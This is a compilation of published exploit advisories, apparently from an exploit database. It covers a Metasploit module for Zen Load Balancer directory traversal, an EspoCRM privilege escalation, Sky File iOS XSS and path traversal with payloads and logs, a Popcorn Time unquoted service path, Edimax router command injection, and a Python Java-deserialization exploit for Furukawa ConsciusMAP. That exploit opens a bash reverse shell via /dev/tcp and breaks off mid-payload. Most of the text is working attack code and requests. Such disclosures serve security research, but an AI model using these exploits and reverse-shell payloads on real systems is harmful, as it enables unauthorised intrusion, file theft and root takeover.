## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => "Zen Load Balancer Directory Traversal", 'Description' => %q{ This module exploits a authenticated directory traversal vulnerability in Zen Load Balancer `v3.10.1`. The flaw exists in 'index.cgi' not properly handling 'filelog=' parameter which allows a malicious actor to load arbitrary file path. }, 'License' => MSF_LICENSE, 'Author' => [ 'Basim Alabdullah', # Vulnerability discovery 'Dhiraj Mishra' # Metasploit module ], 'References' => [ ['EDB', '48308'] ], 'DisclosureDate' => "Apr 10 2020" )) register_options( [ Opt::RPORT(444), OptBool.new('SSL', [true, 'Use SSL', true]), OptInt.new('DEPTH', [true, 'The max traversal depth', 16]), OptString.new('FILEPATH', [false, 'The name of the file to download', '/etc/passwd']), OptString.new('TARGETURI', [true, "The base URI path of the ZenConsole install", '/']), OptString.new('HttpUsername', [true, 'The username to use for the HTTP server', 'admin']), OptString.new('HttpPassword', [false, 'The password to use for the HTTP server', 'admin']) ]) end def run_host(ip) filename = datastore['FILEPATH'] traversal = "../" * datastore['DEPTH'] res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'index.cgi'), 'vars_get'=> { 'id' => '2-3', 'filelog' => "#{traversal}#{filename}", 'nlines' => '100', 'action' => 'See logs' }, 'authorization' => basic_auth(datastore['HttpUsername'],datastore['HttpPassword']) }, 25) unless res && res.code == 200 print_error('Nothing was downloaded') return end print_good("#{peer} - Downloaded #{res.body.length} bytes") path = store_loot( 'zenload.http', 'text/plain', ip, res.body, filename ) print_good("File saved in: #{path}") end end

# Exploit Title: EspoCRM 5.8.5 - Privilege Escalation # Author: Besim ALTINOK # Vendor Homepage: https://www.espocrm.com # Software Link: https://www.espocrm.com/downloads/EspoCRM-5.8.5.zip # Version: v5.8.5 # Tested on: Xampp # Credit: İsmail BOZKURT ------------- Details: -------------------------------------------- 1- When we sent a request to the /api/v1/App/user, we can see user details --- First Request: --------------------------- GET /api/v1/App/user HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 ************************* Authorization: Basic ************************************* Espo-Authorization: ************************************* Espo-Authorization-By-Token: true X-Requested-With: XMLHttpRequest DNT: 1 Connection: close Cookie: auth-token-secret=cdc7f7*********************377; auth-username=user1; auth-token=3a874a********************************48 ---- 2- When we decode Basic Authorization and Espo-Authorization and change the value with another username (like admin) in the first request, we can see other user information and access like BOSS ---------- 3- Some Examples and encode technique - BASE64: First type: dXNlcjE6MQ== (user1:1) Second type: user1:MzNmYzYwZDQ1ZDI2YWNhODYxZTZlYjdiMDgwMjk4TkRn (user1:pass)

# Title: Sky File 2.1.0 iOS - Directory Traversal # Author: Vulnerability Laboratory # Date: 2020-04-21 # Software Link: https://apps.apple.com/us/app/sky-file-wireless-transfer/id1236452210 # CVE: N/A Document Title: =============== Sky File v2.1.0 iOS - Multiple Web Vulnerabilities References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2207 Common Vulnerability Scoring System: ==================================== 7.2 Affected Product(s): ==================== Jin Chen Product: Sky File v2.1.0 - (iOS) Mobile Web Application (https://apps.apple.com/us/app/sky-file-wireless-transfer/id1236452210) Vulnerability Disclosure Timeline: ================================== 2020-04-21: Public Disclosure (Vulnerability Laboratory) Technical Details & Description: ================================ 1.1 Multiple persistent cross site scripting vulnerabilities has been discovered in the official Sky File v2.1.0 mobile ios web-application. The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to web-application requests from the application-side. The cross site vulnerability is located in the 'createFolder' module. Remote attackers with access to the ui via wifi are able to inject own malicious persistent script code to compromise the web-application or user credentials. The request method to inject is POST and the attack vector is located on the application-side. Successful exploitation of the vulnerability results session hijacking, persistent phishing, persistent external redirects and application-side manipulation of the web context of the affected and connected device module. 1.2 A directory traversal web vulnerability has been discovered in the official Sky File v2.1.0 mobile ios web-application. The web vulnerability allows an attacker to unauthorized change the path or directory to access sensitive application data. The directory / path webvulnerability is located in the local ftp server configuration and path validation with the insecure access permissions. Normally the anonymous user account is only able to move inside the main app folder but not above to the web-server and root application files. In case of the issue remote attackers are able to connect with anonymous user account credentials to the wifi ftp server. After that the attacker can use a misconfiguration in the ftp server of the app path to transmit a `/null//` path commands after CWD and CDUP navigation via ftp client. Thus allows the attacker to finally unauthorized access the main root application path. Successful exploitation of the directory traversal vulnerability results in unauthorized file system access and information disclosure. Proof of Concept (PoC): ======================= 1.1 The persistent script code inject vulnerability can be exploited by remote attackers with wifi network access with low user interaction. For security demonstration or to reproduce the web vulnerability follow the provided information and steps below to continue. PoC: Payload %2F%3E%22%3E%3Ciframe+src%3Devil.source+onload%3Dalert(%22PWND%22)%3E%3E%22%3E --- PoC Session Logs [POST] --- Status: 200[OK] POST http://localhost:10000/create Mime Type[application/json] Request Header: Host[localhost:10000] User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0] Accept[application/json, text/javascript, */*; q=0.01] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Content-Type[application/x-www-form-urlencoded; charset=UTF-8] X-Requested-With[XMLHttpRequest] Referer[http://localhost:10000/] Content-Length[140] Connection[keep-alive] POST-Daten: path[%2F%3E%22%3E%3Ciframe+src%3Devil.source+onload%3Dalert(%22PWND%22)%3E%3E%22%3E] Response Header: Cache-Control[no-cache] Content-Length[2] Content-Type[application/json] Connection[Close] Server[GCDWebUploader] - Status: 200[OK] GET http://localhost:10000/list?path=%2F%3E%22%3E%3Ciframe+src%3Devil.source+onload%3Dalert(%22PWND%22)%3E%3E Mime Type[application/json] Request Header: Host[localhost:10000] User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0] Accept[application/json, text/javascript, */*; q=0.01] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] X-Requested-With[XMLHttpRequest] Referer[http://localhost:10000/] Connection[keep-alive] Response Header: Cache-Control[no-cache] Content-Length[2] Content-Type[application/json] Connection[Close] Server[GCDWebUploader] - Status: 200[OK] GET http://localhost:10000/evil.source Mime Type[application/x-unknown-content-type] Request Header: Host[localhost:10000] User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[http://localhost:10000/] Connection[keep-alive] Upgrade-Insecure-Requests[1] Response Header: Server[GCDWebUploader] Connection[Close] 1.2 The directory traversal web vulnerability can be exploited by remote attackers with wifi network access without user interaction. For security demonstration or to reproduce the web vulnerability follow the provided information and steps below to continue. Manual steps to reproduce ... 1. Open the ftp preview the visible folders 2. Jump back to the the following path /private/var/mobile/Containers/Data/Application/A9124FFE-16D8-413B-83B7-4018B69AEB45/ 3. Include the payload /(null)// and refresh via list command 4. You are now placed in an empty folder without permission to move 5. Add to /(null)/../ to the path and refresh the client 6. Path traversal successful to access the main app root path (./) that is normally not accessable 7. Successful reproduce of the path traversal web vulnerability! PoC: Payload /(null)// to /(null)/../ --- PoC Sessio Logs (FTP) --- [21:52:40] [R] 221- Data traffic for this session was 0 bytes in 0 files [21:52:40] [R] 221 Thank you for using the FTP service on localhost. [21:52:40] [R] Logged off: 192.168.2.116 (Duration: 26 seconds) [21:52:42] [R] Connecting to 192.168.2.116 -> IP=192.168.2.116 PORT=10001 [21:52:42] [R] Connected to 192.168.2.116 [21:52:42] [R] 220 iosFtp server ready. [21:52:42] [R] USER anonymous [21:52:42] [R] 331 Password required for (null) [21:52:42] [R] PASS (hidden) [21:52:42] [R] 230 User (null) logged in. [21:52:42] [R] SYST [21:52:42] [R] 215 UNIX Type: L8 Version: iosFtp 20080912 [21:52:42] [R] FEAT [21:52:42] [R] 211-Features supported [21:52:42] [R] UTF8 [21:52:42] [R] 211 End [21:52:42] [R] OPTS UTF8 ON [21:52:42] [R] 200 Type set Opts to UTF8. [21:52:42] [R] PWD [21:52:42] [R] 257 "/private/var/mobile/Containers/Data/Application/A9124FFE-16D8-413B-83B7-4018B69AEB45/Documents/myFolder/iFolder" is the current directory. [21:52:42] [R] CWD /(null)/ [21:52:42] [R] 550 CWD failed. [21:52:42] [R] PWD [21:52:42] [R] 257 "/private/var/mobile/Containers/Data/Application/A9124FFE-16D8-413B-83B7-4018B69AEB45/Documents/myFolder/iFolder" is the current directory. [21:52:42] [R] PASV [21:52:42] [R] 227 Entering Passive Mode (192,168,2,116,39,252) [21:52:42] [R] Opening data connection IP: 192.168.2.116 PORT: 10236 [21:52:42] [R] LIST -al [21:52:42] [R] 150 Opening ASCII mode data connection for '/bin/ls'. [21:52:42] [R] 226 Transfer complete. [21:52:42] [R] List Complete: 149 bytes in 0,08 seconds (0,1 KB/s) [21:52:43] [R] CDUP [21:52:43] [R] 250 CDUP command successful. [21:52:43] [R] PWD [21:52:43] [R] 257 "/private/var/mobile/Containers/Data/Application/A9124FFE-16D8-413B-83B7-4018B69AEB45/Documents/myFolder" is the current directory. [21:52:43] [R] PASV [21:52:43] [R] 227 Entering Passive Mode (192,168,2,116,87,51) [21:52:43] [R] Opening data connection IP: 192.168.2.116 PORT: 22323 [21:52:43] [R] LIST -al [21:52:43] [R] 150 Opening ASCII mode data connection for '/bin/ls'. [21:52:43] [R] 226 Transfer complete. [21:52:43] [R] List Complete: 308 bytes in 0,10 seconds (0,3 KB/s) [21:52:43] [R] CDUP [21:52:44] [R] 250 CDUP command successful. [21:52:44] [R] PWD [21:52:44] [R] 257 "/private/var/mobile/Containers/Data/Application/A9124FFE-16D8-413B-83B7-4018B69AEB45/Documents" is the current directory. [21:52:44] [R] PASV [21:52:44] [R] 227 Entering Passive Mode (192,168,2,116,151,51) [21:52:44] [R] Opening data connection IP: 192.168.2.116 PORT: 38707 [21:52:44] [R] LIST -al [21:52:44] [R] 150 Opening ASCII mode data connection for '/bin/ls'. [21:52:44] [R] 226 Transfer complete. [21:52:44] [R] List Complete: 127 bytes in 0,08 seconds (0,1 KB/s) [21:53:34] [R] CDUP [21:53:34] [R] 250 CDUP command successful. [21:53:34] [R] PWD [21:53:34] [R] 257 "/private/var/mobile/Containers/Data/Application/A9124FFE-16D8-413B-83B7-4018B69AEB45" is the current directory. [21:53:34] [R] PASV [21:53:34] [R] 227 Entering Passive Mode (192,168,2,116,227,14) [21:53:34] [R] Opening data connection IP: 192.168.2.116 PORT: 58126 [21:53:34] [R] LIST -al [21:53:34] [R] 150 Opening ASCII mode data connection for '/bin/ls'. [21:53:34] [R] 226 Transfer complete. [21:53:34] [R] List Complete: 312 bytes in 0,08 seconds (0,3 KB/s) [21:53:35] [R] CDUP [21:53:35] [R] 250 CDUP command successful. [21:53:35] [R] PWD [21:53:35] [R] 257 "(null)" is the current directory. [21:53:35] [R] PASV [21:53:35] [R] 227 Entering Passive Mode (192,168,2,116,159,14) [21:53:35] [R] Opening data connection IP: 192.168.2.116 PORT: 40718 [21:53:35] [R] LIST -al [21:53:35] [R] 150 Opening ASCII mode data connection for '/bin/ls'. [21:53:35] [R] 226 Transfer complete. [21:53:35] [R] List Complete: 0 bytes in 0,07 seconds (0,0 KB/s) [21:53:35] [R] PASV [21:53:35] [R] 227 Entering Passive Mode (192,168,2,116,143,14) [21:53:35] [R] Opening data connection IP: 192.168.2.116 PORT: 36622 [21:53:35] [R] LIST -al [21:53:35] [R] 150 Opening ASCII mode data connection for '/bin/ls'. [21:53:35] [R] 226 Transfer complete. [21:53:35] [R] List Complete: 0 bytes in 0,06 seconds (0,0 KB/s) [21:53:36] [R] CDUP [21:53:36] [R] 550 CDUP command failed. [21:53:41] [R] CWD /etc [21:53:41] [R] 250 CWD command successful. [21:53:41] [R] PWD [21:53:41] [R] 257 "(null)" is the current directory. [21:53:48] [R] CDUP [21:53:48] [R] 550 CDUP command failed. [21:53:51] [R] CWD / [21:53:51] [R] 250 CWD command successful. [21:53:51] [R] PWD [21:53:51] [R] 257 "/" is the current directory. [21:53:51] [R] PASV [21:53:51] [R] 227 Entering Passive Mode (192,168,2,116,221,173) [21:53:51] [R] Opening data connection IP: 192.168.2.116 PORT: 56749 [21:53:51] [R] LIST -al [21:53:51] [R] 150 Opening ASCII mode data connection for '/bin/ls'. [21:53:51] [R] 226 Transfer complete. [21:53:51] [R] List Complete: 741 bytes in 0,10 seconds (0,7 KB/s) [21:54:02] [R] TYPE I [21:54:02] [R] 200 Type set to I. Listing Path ./root - Applications - bin - cores - developer - Library - private - sbin - System - usr - etc - var - tmp Credits & Authors: ================== Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. -- VULNERABILITY LABORATORY - RESEARCH TEAM

# Exploit Title: Popcorn Time 6.2 - 'Update service' Unquoted Service Path # Date: 2020-04-24 # Vendor Homepage: https://getpopcorntime.is # Exploit Authors: Uriel Yochpaz & Jonatan Schor # Software Link: https://dl.getpopcorntime.is/PopcornTime-latest.exe # Version: 6.2.1.14 and probably prior versions # Tested on: Windows 10, 7 # CVE : N/A [+] Description: Popcorn Time For Windows installs as a service with an unquoted service path running with SYSTEM privileges. This could potentially allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. [+] POC: C:\Users\User>sc qc "Update service" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: Update service TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Popcorn Time\Updater.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Update service DEPENDENCIES : SERVICE_START_NAME : LocalSystem [+] Exploit: A successful attempt would require the local user to be able to insert their code in "Program files (x86)" (popcorn.exe) or "C:\" (program.exe) folders undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

# Exploit Title: Edimax EW-7438RPn 1.13 - Remote Code Execution # Date: 2020-04-23 # Exploit Author: Besim ALTINOK # Vendor Homepage: https://www.edimax.com/edimax/merchandise/merchandise_detail/data/edimax/global/wi-fi_range_extenders_n300/ew-7438rpn_mini/ # Version:1.13 # Tested on: Edimax EW-7438RPn 1.13 Version ------ NOTE: This device configurated with root permissions. So you can run the command as root Here is the detail(s) of the RCE(s) 1- Content of the mp.asp file <form action="/goform/mp" method="POST" name="mp"> <input type="text" name="command" value="">&nbsp;<input type="submit" value="GO"> <input type="hidden" name="getID" value="">&nbsp; <input type="hidden" name="getID" value="">&nbsp; </form> RCE Detail: ------------------------------- POST /goform/mp HTTP/1.1 Host: 192.168.2.2 User-Agent: Mozilla/5.0 ********************* Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 25 DNT: 1 Authorization: Basic YWRtaW46MTIzNA== Connection: close Cookie: language=1 Upgrade-Insecure-Requests: 1 command=||busybox+ls&getID= ------------------------------- 2- Content of the syscmd.asp <form action=/goform/formSysCmd method=POST name="formSysCmd"><table border=0 width="500" cellspacing=0 cellpadding=0> <tr><font size=2> This page can be used to run target system command.</tr> <tr><hr size=1 noshade align=top></tr> <tr> <td>System Command: </td> <td><input type="text" name="sysCmd" value="" size="20" maxlength="50"></td> <td> <input type="submit" value="Apply" name="apply" onClick='return saveClick()'></td></form> RCE Detail: ------------------------------- POST /goform/formSysCmd HTTP/1.1 Host: 192.168.2.2 User-Agent: Mozilla/5.0 ********************* Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 11 DNT: 1 Authorization: Basic YWRtaW46MTIzNA== Connection: close Cookie: language=1 Upgrade-Insecure-Requests: 1 sysCmd="command to here"

# Exploit Title: Furukawa Electric ConsciusMAP 2.8.1 - Remote Code Execution # Date: 2020-04-24 # Vendor Homepage: https://www.tecnoredsa.com.ar # Exploit Authors: LiquidWorm # Software Link: https://dl.getpopcorntime.is/PopcornTime-latest.exe # Version: 2.8.1 # CVE : N/A #!/usr/bin/env python3 # -*- coding: utf-8 -*- # # # Furukawa Electric ConsciusMAP 2.8.1 Java Deserialization Remote Code Execution # # # Vendor: Furukawa Electric Co., Ltd. | Tecnored SA # Product web page: https://www.furukawa.co.jp | https://www.tecnoredsa.com.ar # Affected version: APROS Evolution | 2.8.1 # FURUKAWA | 2.7.10 # ConsciusMAP | 2.6.4 # | 2.3.1 # | 2.1.49 # | 2.1.36 # | 2.1.31 # | 2.1.18 # | 2.1.16 # | 2.1.15 # | 2.1.1 # | 2.0.1174 # | 1.8 # | 1.4.70 # # Summary: Apros Evoluation / Furukawa / ConsciusMap is the Tecnored # provisioning system for FTTH networks. Complete administration of # your entire external FTTH network plant, including from the ONUs # installed in each end customer, to the wiring and junction boxes. # Unify all the management of your FTTH network on a single platform. # Unify all your data, whether from customers, your network, or the # external plant in one place. APROS FTTH allows you to manage your # entire FTTH network in a simple and globalized way with just one # click, without being a network expert. Includes services such as: # bandwidth limitation, Turbo Internet for time plans, BURST Internet, # QinQ for companies, and many more. General consumption graphics and # per customer in real time. Captive Portal for cutting or suspension # of the service. # # Desc: The FTTH provisioning solution suffers from an unauthenticated # remote code execution vulnerability due to an unsafe deserialization # of Java objects (ViewState) triggered via the 'javax.faces.ViewState' # HTTP POST parameter. The deserialization can cause the vulnerable JSF # web application to execute arbitrary Java functions, malicious Java # bytecode, and system shell commands with root privileges. # # =================================================================== # $ ./furukawa.py 172.16.0.1:8080 172.168.0.200 4444 # [*] Setting up valid URL path # [*] Starting callback listener child thread # [*] Starting handler on port 4444 # [*] Sending serialized object # [*] Connection from 172.16.0.1:48446 # [*] You got shell! # tomcat7@zslab:/var/lib/tomcat7$ id # uid=114(tomcat7) gid=124(tomcat7) grupos=124(tomcat7),1003(furukawa) # tomcat7@zslab:/var/lib/tomcat7$ sudo su # id # uid=0(root) gid=0(root) grupos=0(root) # exit # tomcat7@zslab:/var/lib/tomcat7$ exit # *** Connection closed by remote host *** # =================================================================== # # Tested on: Apache Tomcat/7.0.68 # Apache Tomcat/7.0.52 # Apache MyFaces/2.2.1 # Apache MyFaces/2.1.17 # Apache MyFaces/2.0.10 # GNU/Linux 4.4.0-173 # GNU/Linux 4.4.0-137 # GNU/Linux 4.4.0-101 # GNU/Linux 4.4.0-83 # GNU/Linux 3.15.0 # GNU/Linux 3.13.0-32 # PrimeFaces/4.0.RC1 # Apache-Coyote/1.1 # ACC Library 3.1 # Ubuntu 16.04.2 # Ubuntu 14.04.2 # Java/1.8.0_242 # Java/1.8.0_181 # Java/1.8.0_131 # Java/1.7.0_79 # MySQL 5.7.29 # MySQL 5.7.18 # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # Macedonian Information Security Research and Development Laboratory # Zero Science Lab - https://www.zeroscience.mk - @zeroscience # # # Advisory ID: ZSL-2020-5565 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5565.php # # CVE ID: CVE-2020-12133 # CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-12133 # # # 24.02.2020 # import os############# import sys############ import gzip#######o### import zlib########### import socket######### import base64######### import urllib######### import requests####### import telnetlib###### import threading###### import subprocess##### from io import BytesIO from time import sleep from flash import blic class Optics: def __init__(self): self.callback = None# self.headers = None## self.payload = None## self.target = None### self.lport = None#### self.path = None##### self.cmd = None###### def allears(self): telnetus = telnetlib.Telnet() print("[*] Starting handler on port {}".format(self.lport)) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind(("0.0.0.0", self.lport)) while True: try: s.settimeout(8) s.listen(1) conn, addr = s.accept() print("[*] Connection from {}:{}".format(addr[0], addr[1])) telnetus.sock = conn except socket.timeout as p: print("[!] Probably not vulnerable... ({poraka})".format(poraka=p)) print("[+] Check your port mappings.") s.close() exit(0) break print("[*] You got shell!") # # UnicodeDecodeError dirty fix: # /usr/lib/python3.6/telnetlib.py # Change from 'ascii' to 'utf-8' (Lines: 553 and 556) # telnetus.interact() conn.close() def thricer(self): print("[*] Starting callback listener child thread") konac = threading.Thread(name="ZSL", target=self.allears) konac.start() sleep(1) self.gadget() def gadget(self): self.cmd = "/bin/bash -c /bin/bash${IFS}-i>&/dev/tcp/" self.cmd += self.callback self.cmd += "/" self.cmd += str(self.lport) self.cmd += "<&1" payload = b"\xAC\xED\x00\x05\x73\x72\x00\x11\x6A\x61\x76\x61\x2E\x75\x74\x69\x6C" payload += b"\x2E\x48\x61\x73\x68\x53\x65\x74\xBA\x44\x85\x95\x96\xB8\xB7\x34\x03" payload += b"\x00\x00\x78\x70\x77\x0C\x00\x00\x00\x02\x3F\x40\x00\x00\x00\x00\x00" payload += b"\x01\x73\x72\x00\x34\x6F\x72\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x63" payload += b"\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E" payload += b"\x73\x2E\x6B\x65\x79\x76\x61\x6C\x75\x65\x2E\x54\x69\x65\x64\x4D\x61" payload += b"\x70\x45\x6E\x74\x72\x79\x8A\xAD\xD2\x9B\x39\xC1\x1F\xDB\x02\x00\x02" payload += b"\x4C\x00\x03\x6B\x65\x79\x74\x00\x12\x4C\x6A\x61\x76\x61\x2F\x6C\x61" payload += b"\x6E\x67\x2F\x4F\x62\x6A\x65\x63\x74\x3B\x4C\x00\x03\x6D\x61\x70\x74" payload += b"\x00\x0F\x4C\x6A\x61\x76\x61\x2F\x75\x74\x69\x6C\x2F\x4D\x61\x70\x3B" payload += b"\x78\x70\x74\x00\x26\x68\x74\x74\x70\x73\x3A\x2F\x2F\x67\x69\x74\x68" payload += b"\x75\x62\x2E\x63\x6F\x6D\x2F\x6A\x6F\x61\x6F\x6D\x61\x74\x6F\x73\x66" payload += b"\x2F\x6A\x65\x78\x62\x6F\x73\x73\x20\x73\x72\x00\x2A\x6F\x72\x67\x2E" payload += b"\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F" payload += b"\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2E\x6D\x61\x70\x2E\x4C\x61\x7A" payload += b"\x79\x4D\x61\x70\x6E\xE5\x94\x82\x9E\x79\x10\x94\x03\x00\x01\x4C\x00" payload += b"\x07\x66\x61\x63\x74\x6F\x72\x79\x74\x00\x2C\x4C\x6F\x72\x67\x2F\x61" payload += b"\x70\x61\x63\x68\x65\x2F\x63\x6F\x6D\x6D\x6F\x6E\x73\x2F\x63\x6F\x6C" payload += b"\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2F\x54\x72\x61\x6E\x73\x66\x6F\x72" payload += b"\x6D\x65\x72\x3B\x78\x70\x73\x72\x00\x3A\x6F\x72\x67\x2E\x61\x70\x61" payload += b"\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C\x65" payload += b"\x63\x74\x69\x6F\x6E\x73\x2E\x66\x75\x6E\x63\x74\x6F\x72\x73\x2E\x43" payload += b"\x68\x61\x69\x6E\x65\x64\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72" payload += b"\x30\xC7\x97\xEC\x28\x7A\x97\x04\x02\x00\x01\x5B\x00\x0D\x69\x54\x72" payload += b"\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x73\x74\x00\x2D\x5B\x4C\x6F\x72" payload += b"\x67\x2F\x61\x70\x61\x63\x68\x65\x2F\x63\x6F\x6D\x6D\x6F\x6E\x73\x2F" payload += b"\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2F\x54\x72\x61\x6E\x73" payload += b"\x66\x6F\x72\x6D\x65\x72\x3B\x78\x70\x75\x72\x00\x2D\x5B\x4C\x6F\x72" payload += b"\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E" payload += b"\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2E\x54\x72\x61\x6E\x73" payload += b"\x66\x6F\x72\x6D\x65\x72\x3B\xBD\x56\x2A\xF1\xD8\x34\x18\x99\x02\x00" payload += b"\x00\x78\x70\x00\x00\x00\x05\x73\x72\x00\x3B\x6F\x72\x67\x2E\x61\x70" payload += b"\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C" payload += b"\x65\x63\x74\x69\x6F\x6E\x73\x2E\x66\x75\x6E\x63\x74\x6F\x72\x73\x2E" payload += b"\x43\x6F\x6E\x73\x74\x61\x6E\x74\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D" payload += b"\x65\x72\x58\x76\x90\x11\x41\x02\xB1\x94\x02\x00\x01\x4C\x00\x09\x69" payload += b"\x43\x6F\x6E\x73\x74\x61\x6E\x74\x71\x00\x7E\x00\x03\x78\x70\x76\x72" payload += b"\x00\x11\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x52\x75\x6E\x74\x69" payload += b"\x6D\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x73\x72" payload += b"\x00\x3A\x6F\x72\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D" payload += b"\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2E\x66" payload += b"\x75\x6E\x63\x74\x6F\x72\x73\x2E\x49\x6E\x76\x6F\x6B\x65\x72\x54\x72" payload += b"\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x87\xE8\xFF\x6B\x7B\x7C\xCE\x38" payload += b"\x02\x00\x03\x5B\x00\x05\x69\x41\x72\x67\x73\x74\x00\x13\x5B\x4C\x6A" payload += b"\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x4F\x62\x6A\x65\x63\x74\x3B\x4C" payload += b"\x00\x0B\x69\x4D\x65\x74\x68\x6F\x64\x4E\x61\x6D\x65\x74\x00\x12\x4C" payload += b"\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x53\x74\x72\x69\x6E\x67\x3B" payload += b"\x5B\x00\x0B\x69\x50\x61\x72\x61\x6D\x54\x79\x70\x65\x73\x74\x00\x12" payload += b"\x5B\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x43\x6C\x61\x73\x73" payload += b"\x3B\x78\x70\x75\x72\x00\x13\x5B\x4C\x6A\x61\x76\x61\x2E\x6C\x61\x6E" payload += b"\x67\x2E\x4F\x62\x6A\x65\x63\x74\x3B\x90\xCE\x58\x9F\x10\x73\x29\x6C" payload += b"\x02\x00\x00\x78\x70\x00\x00\x00\x02\x74\x00\x0A\x67\x65\x74\x52\x75" payload += b"\x6E\x74\x69\x6D\x65\x75\x72\x00\x12\x5B\x4C\x6A\x61\x76\x61\x2E\x6C" payload += b"\x61\x6E\x67\x2E\x43\x6C\x61\x73\x73\x3B\xAB\x16\xD7\xAE\xCB\xCD\x5A" payload += b"\x99\x02\x00\x00\x78\x70\x00\x00\x00\x00\x74\x00\x09\x67\x65\x74\x4D" payload += b"\x65\x74\x68\x6F\x64\x75\x71\x00\x7E\x00\x1B\x00\x00\x00\x02\x76\x72" payload += b"\x00\x10\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x53\x74\x72\x69\x6E" payload += b"\x67\xA0\xF0\xA4\x38\x7A\x3B\xB3\x42\x02\x00\x00\x78\x70\x76\x71\x00" payload += b"\x7E\x00\x1B\x73\x71\x00\x7E\x00\x13\x75\x71\x00\x7E\x00\x18\x00\x00" payload += b"\x00\x02\x70\x75\x71\x00\x7E\x00\x18\x00\x00\x00\x00\x74\x00\x06\x69" payload += b"\x6E\x76\x6F\x6B\x65\x75\x71\x00\x7E\x00\x1B\x00\x00\x00\x02\x76\x72" payload += b"\x00\x10\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x4F\x62\x6A\x65\x63" payload += b"\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x76\x71\x00" payload += b"\x7E\x00\x18\x73\x71\x00\x7E\x00\x13\x75\x72\x00\x13\x5B\x4C\x6A\x61" payload += b"\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x53\x74\x72\x69\x6E\x67\x3B\xAD\xD2" payload += b"\x56\xE7\xE9\x1D\x7B\x47\x02\x00\x00\x78\x70\x00\x00\x00\x01\x74\x00" payload += (bytes(chr(len(self.cmd)), "utf-8"))##################################" payload += (bytes(self.cmd, "utf-8"))############################################" payload += b"\x74\x00\x04\x65\x78\x65\x63\x75\x71\x00\x7E\x00\x1B\x00\x00\x00\x01" payload += b"\x71\x00\x7E\x00\x20\x73\x71\x00\x7E\x00\x0F\x73\x72\x00\x11\x6A\x61" payload += b"\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x49\x6E\x74\x65\x67\x65\x72\x12\xE2" payload += b"\xA0\xA4\xF7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6C\x75\x65" payload += b"\x78\x72\x00\x10\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x4E\x75\x6D" payload += 